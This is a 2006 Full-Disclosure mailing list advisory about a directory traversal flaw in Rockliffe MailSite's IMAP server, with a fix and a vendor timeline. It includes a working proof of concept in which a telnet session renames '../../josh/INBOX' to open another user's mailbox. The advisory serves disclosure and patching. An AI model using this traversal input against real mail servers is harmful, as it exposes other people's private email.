[Full-disclosure] Rockliffe Directory Transversal Vulnerability



Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.

Product: Rockliffe Mailsite
	 http://www.rockliffe.com

Version: Confirmed on Mailsite < 6.1.22.1

Author: Josh Zlatin-Amishav

Date: January 4, 2006

Background:
Rockliffe MailSite secure email server software and MailSite MP secure email
gateways provide email server solutions and gateway email protection for businesses and service providers. Rockliffe has more than 3,000 customers hosting more than 15 million mailboxes worldwide.


Issue:
In working with researchers at Tenable Network Security, I have come across
a directory transversal flaw in the IMAP server. It is possible for an authenticated user to access any user's inbox via a RENAME command.


PoC:

josh@lab1:~$ telnet 10.0.0.5 143
Trying 10.0.0.5...
Connected to 10.0.0.5.
Escape character is '^]'.
* OK  MailSite IMAP4 Server 6.1.22.0 ready
a1 login joe pass
a1 OK LOGIN completed
a2 rename ../../josh/INBOX gotcha
a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
a3 select gotcha
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* 0 EXISTS
* 0 RECENT
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
* OK [UNSEEN 0]
* OK [UIDVALIDITY 514563061] UIDs are valid
a3 OK [READ-WRITE] opened gotcha

user joe can now access the contents of user josh's INBOX directory.

Vendor notified: January 3, 2006 06:12AM

Vendor Response:
Contact your sales rep about purchasing Mailsite 7.0.3.1

Solution:
Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
the directory transversal problem. Either upgrade to version 6.1.22 and install the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of Mailsite. The hotfix can be obtained at:


ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe

References: http://www.rockliffe.com
References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: [Full-disclosure] Rockliffe Directory Transversal Vulnerability
    ... Rockliffe MailSite secure email server software and MailSite MP secure email gateways provide email server solutions and gateway email protection for businesses and service providers. ... In working with researchers at Tenable Network Security, I have come across a directory transversal flaw in the IMAP server. ... It is possible for an authenticated user to access any user's inbox via a RENAME command. ...
    (Full-Disclosure)
  • Re: Offline Files -- & -- Migration Strategy
    ... So your mail is delivered to a mailbox on your MailSite server, ... Outlook, running on your desktop PC, retrieves it using POP, right? ... just configure Exchange to be the SMTP server as in a normal SBS ...
    (microsoft.public.windows.server.sbs)
  • Re: Exchange and Foreign Email Server setup
    ... I think you need to check your MailSite system and make sure it is allowing ... SMTP relay, but only for your backend server. ... even if the sender is an exchange user. ...
    (microsoft.public.exchange.admin)
  • S/MIME: alternative message for secure email?
    ... I have an application that will send secure email to a group of recipients ... who have registered their public keys with the server. ...
    (microsoft.public.platformsdk.security)
  • Re: [Full-disclosure] Rockliffe Directory Transversal Vulnerability
    ... Rockliffe's Mailsite Imap Directory Transversal Vulnerability. ... > Rockliffe MailSite secure email server software and MailSite MP secure email ... > a directory transversal flaw in the IMAP server. ...
    (Full-Disclosure)